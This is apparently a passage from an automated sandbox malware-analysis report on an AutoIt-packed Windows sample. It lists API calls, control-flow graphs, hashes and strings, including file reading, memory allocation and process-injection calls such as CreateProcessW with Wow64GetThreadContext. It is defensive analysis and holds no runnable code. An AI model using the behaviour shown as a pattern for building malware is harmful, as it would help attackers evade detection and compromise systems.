                                                        • API String ID: 2673923337-3586390629
                                                        • Opcode ID: 5de3b48eb0bdba58a9b8a2d81bc80c806085e29ac2ca995c511369b00ada2d2e
                                                        • Instruction ID: 152642a153147d2df9386290539e274d20fa62d45f543a7c01792bbf6c34ec0b
                                                        • Opcode Fuzzy Hash: 5de3b48eb0bdba58a9b8a2d81bc80c806085e29ac2ca995c511369b00ada2d2e
                                                        • Instruction Fuzzy Hash: D7718A71508305DEC304EF29EC45E6BBBE8FF88350F40496EF545872A1EB75A948CB92

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 007C3074
                                                        • RegisterClassExW.USER32(00000030), ref: 007C309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007C30AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 007C30CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007C30DC
                                                        • LoadIconW.USER32(000000A9), ref: 007C30F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007C3101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: b0967b28aa231bb2f143ffcdbcfdbec8fc16750aebf3a90acc95cdf4b44f0386
                                                        • Instruction ID: 3a58a20552b85720f442f521fbb613cd14bf2242acd26c7e2e6ebd8aa3074e46
                                                        • Opcode Fuzzy Hash: b0967b28aa231bb2f143ffcdbcfdbec8fc16750aebf3a90acc95cdf4b44f0386
                                                        • Instruction Fuzzy Hash: 253129B5940349EFDB50CFA8DC49ADABBF4FB09310F14412EE690E6261D7B90581CF91

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 007C3074
                                                        • RegisterClassExW.USER32(00000030), ref: 007C309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007C30AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 007C30CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007C30DC
                                                        • LoadIconW.USER32(000000A9), ref: 007C30F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007C3101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: a76d8bbe00693fa2591149b73e26b112431e61c2f965000560a3f9b4ce157b9b
                                                        • Instruction ID: ad943393f61fd954df02222991c7620f18195845984588c464cff8af2746fcff
                                                        • Opcode Fuzzy Hash: a76d8bbe00693fa2591149b73e26b112431e61c2f965000560a3f9b4ce157b9b
                                                        • Instruction Fuzzy Hash: A721C4B9D51658AFDB00DFA8EC89B9EBBF4FB09700F00412AFA10E62A1D7B54544CF91

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 007C3A50
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 007C3A5F
                                                        • LoadIconW.USER32(00000063), ref: 007C3A76
                                                        • LoadIconW.USER32(000000A4), ref: 007C3A88
                                                        • LoadIconW.USER32(000000A2), ref: 007C3A9A
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007C3AC0
                                                        • RegisterClassExW.USER32(?), ref: 007C3B16
                                                          • Part of subcall function 007C3041: GetSysColorBrush.USER32(0000000F), ref: 007C3074
                                                          • Part of subcall function 007C3041: RegisterClassExW.USER32(00000030), ref: 007C309E
                                                          • Part of subcall function 007C3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007C30AF
                                                          • Part of subcall function 007C3041: InitCommonControlsEx.COMCTL32(?), ref: 007C30CC
                                                          • Part of subcall function 007C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007C30DC
                                                          • Part of subcall function 007C3041: LoadIconW.USER32(000000A9), ref: 007C30F2
                                                          • Part of subcall function 007C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007C3101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: 6a1babd99c0d4a674fd282fd3aab251c39e3d6fa5b74140867adffaf90f700dc
                                                        • Instruction ID: b318eee7c8c6d80b73378fb79c26fdc179444ad9e5e0210cac7b352ad2015e12
                                                        • Opcode Fuzzy Hash: 6a1babd99c0d4a674fd282fd3aab251c39e3d6fa5b74140867adffaf90f700dc
                                                        • Instruction Fuzzy Hash: 57214B75D00308AFEB10DFA8EC19B9D7FB1FB08711F00412AF604A62A2DBB95A50CF84

                                                        Control-flow Graph

                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 007C36D2
                                                        • KillTimer.USER32(?,00000001), ref: 007C36FC
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007C371F
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007C372A
                                                        • CreatePopupMenu.USER32 ref: 007C373E
                                                        • PostQuitMessage.USER32(00000000), ref: 007C374D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: 19b867bd18d72a11cb5164cd87cf76c1cf9bca8f5bce6ea9da23cd2313998ade
                                                        • Instruction ID: 7e8d4c8366a6d4c67f456e577bc3a5a4cae48637ded7b1a51433f904a7fa39fa
                                                        • Opcode Fuzzy Hash: 19b867bd18d72a11cb5164cd87cf76c1cf9bca8f5bce6ea9da23cd2313998ade
                                                        • Instruction Fuzzy Hash: 4C4127B2200549FBDB246F68EC49F7A3B65FB01340F10412EF606E63A2DB6D9E5497A1

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                        • API String ID: 1825951767-3513169116
                                                        • Opcode ID: ff914032c60fe4a58377159a0cb8e111fea946366fbb63b052988a6934adde5a
                                                        • Instruction ID: 24223c4115f5fc9e2f37e854c50be7fcaf028f20acb1c94a81e0b851e10c04ba
                                                        • Opcode Fuzzy Hash: ff914032c60fe4a58377159a0cb8e111fea946366fbb63b052988a6934adde5a
                                                        • Instruction Fuzzy Hash: B4A13B7190022DDADB14EBA4DC99EEEB779FF14310F44442DE516A7192DF786A08CBA0

                                                        Control-flow Graph

                                                        control_flow_graph 944 f74588-f74636 call f71f98 947 f7463d-f74663 call f75498 CreateFileW 944->947 950 f74665 947->950 951 f7466a-f7467a 947->951 952 f747b5-f747b9 950->952 959 f74681-f7469b VirtualAlloc 951->959 960 f7467c 951->960 953 f747fb-f747fe 952->953 954 f747bb-f747bf 952->954 956 f74801-f74808 953->956 957 f747c1-f747c4 954->957 958 f747cb-f747cf 954->958 963 f7485d-f74872 956->963 964 f7480a-f74815 956->964 957->958 965 f747d1-f747db 958->965 966 f747df-f747e3 958->966 961 f746a2-f746b9 ReadFile 959->961 962 f7469d 959->962 960->952 967 f746c0-f74700 VirtualAlloc 961->967 968 f746bb 961->968 962->952 971 f74874-f7487f VirtualFree 963->971 972 f74882-f7488a 963->972 969 f74817 964->969 970 f74819-f74825 964->970 965->966 973 f747e5-f747ef 966->973 974 f747f3 966->974 975 f74707-f74722 call f756e8 967->975 976 f74702 967->976 968->952 969->963 977 f74827-f74837 970->977 978 f74839-f74845 970->978 971->972 973->974 974->953 984 f7472d-f74737 975->984 976->952 980 f7485b 977->980 981 f74847-f74850 978->981 982 f74852-f74858 978->982 980->956 981->980 982->980 985 f7476a-f7477e call f754f8 984->985 986 f74739-f74768 call f756e8 984->986 991 f74782-f74786 985->991 992 f74780 985->992 986->984 994 f74792-f74796 991->994 995 f74788-f7478c CloseHandle 991->995 992->952 996 f747a6-f747af 994->996 997 f74798-f747a3 VirtualFree 994->997 995->994 996->947 996->952 997->996
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F74659
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F7487F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668345500.0000000000F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F71000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f71000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                        • Instruction ID: c62120050f66fa7ecc9adaf6727fe1e7efef99177ea347167b88aeeff3938374
                                                        • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                        • Instruction Fuzzy Hash: 1CA12874E00208EBDB14CFA4C894BEEB7B5BF49314F20815AE519BB280D775AE41DF62

                                                        Control-flow Graph

                                                        control_flow_graph 1075 7c39d5-7c3a45 CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007C3A03
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007C3A24
                                                        • ShowWindow.USER32(00000000,?,?), ref: 007C3A38
                                                        • ShowWindow.USER32(00000000,?,?), ref: 007C3A41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: a8d8a67931e22fcfd95e90c0bfc690c53245e09f55750d414c9ea317e9df6cae
                                                        • Instruction ID: f204ff4380dd0383c575f1750f6da18b3a7e6ad43f6c9d1d69cde1d4851ba59a
                                                        • Opcode Fuzzy Hash: a8d8a67931e22fcfd95e90c0bfc690c53245e09f55750d414c9ea317e9df6cae
                                                        • Instruction Fuzzy Hash: 99F03A705402947EEA31572B6C08E2B3E7DF7C7F50F00002EBA00A2271CB650800CBB0

                                                        Control-flow Graph

                                                        control_flow_graph 1076 f74348-f74489 call f71f98 call f74238 CreateFileW 1083 f74490-f744a0 1076->1083 1084 f7448b 1076->1084 1087 f744a7-f744c1 VirtualAlloc 1083->1087 1088 f744a2 1083->1088 1085 f74540-f74545 1084->1085 1089 f744c5-f744dc ReadFile 1087->1089 1090 f744c3 1087->1090 1088->1085 1091 f744e0-f7451a call f74278 call f73238 1089->1091 1092 f744de 1089->1092 1090->1085 1097 f74536-f7453e ExitProcess 1091->1097 1098 f7451c-f74531 call f742c8 1091->1098 1092->1085 1097->1085 1098->1097
                                                        APIs
                                                          • Part of subcall function 00F74238: Sleep.KERNELBASE(000001F4), ref: 00F74249
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F7447F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668345500.0000000000F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F71000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f71000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: T7FN45UXXBVA9M473
                                                        • API String ID: 2694422964-2577079847
                                                        • Opcode ID: 30c58e58f9af1cca77b9ffd2a1ce0013458780ec5a05734609281c698148b565
                                                        • Instruction ID: c60f6954d6341c749abd34d6e2b220b57c207cc8a22cac2f6f540540f642e283
                                                        • Opcode Fuzzy Hash: 30c58e58f9af1cca77b9ffd2a1ce0013458780ec5a05734609281c698148b565
                                                        • Instruction Fuzzy Hash: BA51A131D04248EBEF11DBB4D854BEEBB79AF18700F144199E608BB2C1DBB91B44DB66

                                                        Control-flow Graph

                                                        control_flow_graph 1100 7c407c-7c4092 1101 7c416f-7c4173 1100->1101 1102 7c4098-7c40ad call 7c7a16 1100->1102 1105 7fd3c8-7fd3d7 LoadStringW 1102->1105 1106 7c40b3-7c40d3 call 7c7bcc 1102->1106 1109 7fd3e2-7fd3fa call 7c7b2e call 7c6fe3 1105->1109 1106->1109 1110 7c40d9-7c40dd 1106->1110 1119 7c40ed-7c416a call 7e2de0 call 7c454e call 7e2dbc Shell_NotifyIconW call 7c5904 1109->1119 1122 7fd400-7fd41e call 7c7cab call 7c6fe3 call 7c7cab 1109->1122 1112 7c4174-7c417d call 7c8047 1110->1112 1113 7c40e3-7c40e8 call 7c7b2e 1110->1113 1112->1119 1113->1119 1119->1101 1122->1119
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007FD3D7
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        • _memset.LIBCMT ref: 007C40FC
                                                        • _wcscpy.LIBCMT ref: 007C4150
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007C4160
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 3942752672-1585850449
                                                        • Opcode ID: 5403d6c62b3fafdd3c23cfd9d8b060aaba4ccc01f4846195df30166fe20ec3ce
                                                        • Instruction ID: 4a3c177539daa2be07189022d5d493e9d160146957bf8613d7e3827cc522737e
                                                        • Opcode Fuzzy Hash: 5403d6c62b3fafdd3c23cfd9d8b060aaba4ccc01f4846195df30166fe20ec3ce
                                                        • Instruction Fuzzy Hash: 6931AD71008709AFD325EB64DC4AFDB77DCAF54310F10491EF685921A2EF78AA48CB96

                                                        Control-flow Graph

                                                        control_flow_graph 1135 7c686a-7c6891 call 7c4ddd 1138 7c6897-7c68a5 call 7c4ddd 1135->1138 1139 7fe031-7fe041 call 82955b 1135->1139 1138->1139 1146 7c68ab-7c68b1 1138->1146 1142 7fe046-7fe048 1139->1142 1144 7fe04a-7fe04d call 7c4e4a 1142->1144 1145 7fe067-7fe0af call 7e0db6 1142->1145 1148 7fe052-7fe061 call 8242f8 1144->1148 1156 7fe0d4 1145->1156 1157 7fe0b1-7fe0bb 1145->1157 1147 7c68b7-7c68d9 call 7c6a8c 1146->1147 1146->1148 1148->1145 1159 7fe0d6-7fe0e9 1156->1159 1158 7fe0cf-7fe0d0 1157->1158 1160 7fe0bd-7fe0cc 1158->1160 1161 7fe0d2 1158->1161 1162 7fe0ef 1159->1162 1163 7fe260-7fe263 call 7e2d55 1159->1163 1160->1158 1161->1159 1165 7fe0f6-7fe0f9 call 7c7480 1162->1165 1166 7fe268-7fe271 call 7c4e4a 1163->1166 1169 7fe0fe-7fe120 call 7c5db2 call 8273e9 1165->1169 1172 7fe273-7fe283 call 7c7616 call 7c5d9b 1166->1172 1179 7fe134-7fe13e call 8273d3 1169->1179 1180 7fe122-7fe12f 1169->1180 1188 7fe288-7fe2b8 call 81f7a1 call 7e0e2c call 7e2d55 call 7c4e4a 1172->1188 1186 7fe158-7fe162 call 8273bd 1179->1186 1187 7fe140-7fe153 1179->1187 1182 7fe227-7fe237 call 7c750f 1180->1182 1182->1169 1192 7fe23d-7fe247 call 7c735d 1182->1192 1196 7fe176-7fe180 call 7c5e2a 1186->1196 1197 7fe164-7fe171 1186->1197 1187->1182 1188->1172 1199 7fe24c-7fe25a 1192->1199 1196->1182 1205 7fe186-7fe19e call 81f73d 1196->1205 1197->1182 1199->1163 1199->1165 1210 7fe1c1-7fe1c4 1205->1210 1211 7fe1a0-7fe1bf call 7c7de1 call 7c5904 1205->1211 1212 7fe1c6-7fe1e1 call 7c7de1 call 7c6839 call 7c5904 1210->1212 1213 7fe1f2-7fe1f5 1210->1213 1234 7fe1e2-7fe1f0 call 7c5db2 1211->1234 1212->1234 1217 7fe1f7-7fe200 call 81f65e 1213->1217 1218 7fe215-7fe218 call 82737f 1213->1218 1217->1188 1227 7fe206-7fe210 call 7e0e2c 1217->1227 1225 7fe21d-7fe226 call 7e0e2c 1218->1225 1225->1182 1227->1169 1234->1225
                                                        APIs
                                                          • Part of subcall function 007C4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007C4E0F
                                                        • _free.LIBCMT ref: 007FE263
                                                        • _free.LIBCMT ref: 007FE2AA
                                                          • Part of subcall function 007C6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007C6BAD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                        • API String ID: 2861923089-1757145024
                                                        • Opcode ID: f6079ab6aa4b517b1db52dabc8856967156789a36862dedbe042a18d890fea6f
                                                        • Instruction ID: 56fd22d4452df419e7aec4a075230a4d8d0384548fca18b27143922cbb9a86cc
                                                        • Opcode Fuzzy Hash: f6079ab6aa4b517b1db52dabc8856967156789a36862dedbe042a18d890fea6f
                                                        • Instruction Fuzzy Hash: 2B913B7190021DEFCF04EFA4CC959EDB7B8FF09310B10442DE916AB2A1DB79A945CB50
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007C35A1,SwapMouseButtons,00000004,?), ref: 007C35D4
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007C35A1,SwapMouseButtons,00000004,?,?,?,?,007C2754), ref: 007C35F5
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,007C35A1,SwapMouseButtons,00000004,?,?,?,?,007C2754), ref: 007C3617
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: 0306ffc66f523e8c6df8a599478515d64c742d973a12719455ad7c07ffa8c794
                                                        • Instruction ID: 486481baf0eb302dcfd1d81800687f1a97a7b565a961184d7f1172d47353ad06
                                                        • Opcode Fuzzy Hash: 0306ffc66f523e8c6df8a599478515d64c742d973a12719455ad7c07ffa8c794
                                                        • Instruction Fuzzy Hash: 1E114575610208BFDB208F64DC80EAEBBB8EF45740F01846DF905E7210E2729E409BA0
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00F739F3
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F73A89
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F73AAB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668345500.0000000000F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F71000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f71000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                        • Instruction ID: fbf01f93f444e036a6b2b1793d227efbd707580e13185044449b23efa802b3bc
                                                        • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                        • Instruction Fuzzy Hash: 2C62FB30A14658DBEB24CFA4C841BDEB376EF58300F1091A9D10DEB394E7799E81DB5A
                                                        APIs
                                                          • Part of subcall function 007C4EE5: _fseek.LIBCMT ref: 007C4EFD
                                                          • Part of subcall function 00829734: _wcscmp.LIBCMT ref: 00829824
                                                          • Part of subcall function 00829734: _wcscmp.LIBCMT ref: 00829837
                                                        • _free.LIBCMT ref: 008296A2
                                                        • _free.LIBCMT ref: 008296A9
                                                        • _free.LIBCMT ref: 00829714
                                                          • Part of subcall function 007E2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,007E9A24), ref: 007E2D69
                                                          • Part of subcall function 007E2D55: GetLastError.KERNEL32(00000000,?,007E9A24), ref: 007E2D7B
                                                        • _free.LIBCMT ref: 0082971C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction ID: 7afb7955d57276fac01f3f2ec2195c9350de2e289d67d4b428d68659fb2d0579
                                                        • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction Fuzzy Hash: 10515BB1A04268EFDF249F65DC85A9EBBB9FF48300F10049EF249A3241DB755A80CF58
                                                        APIs
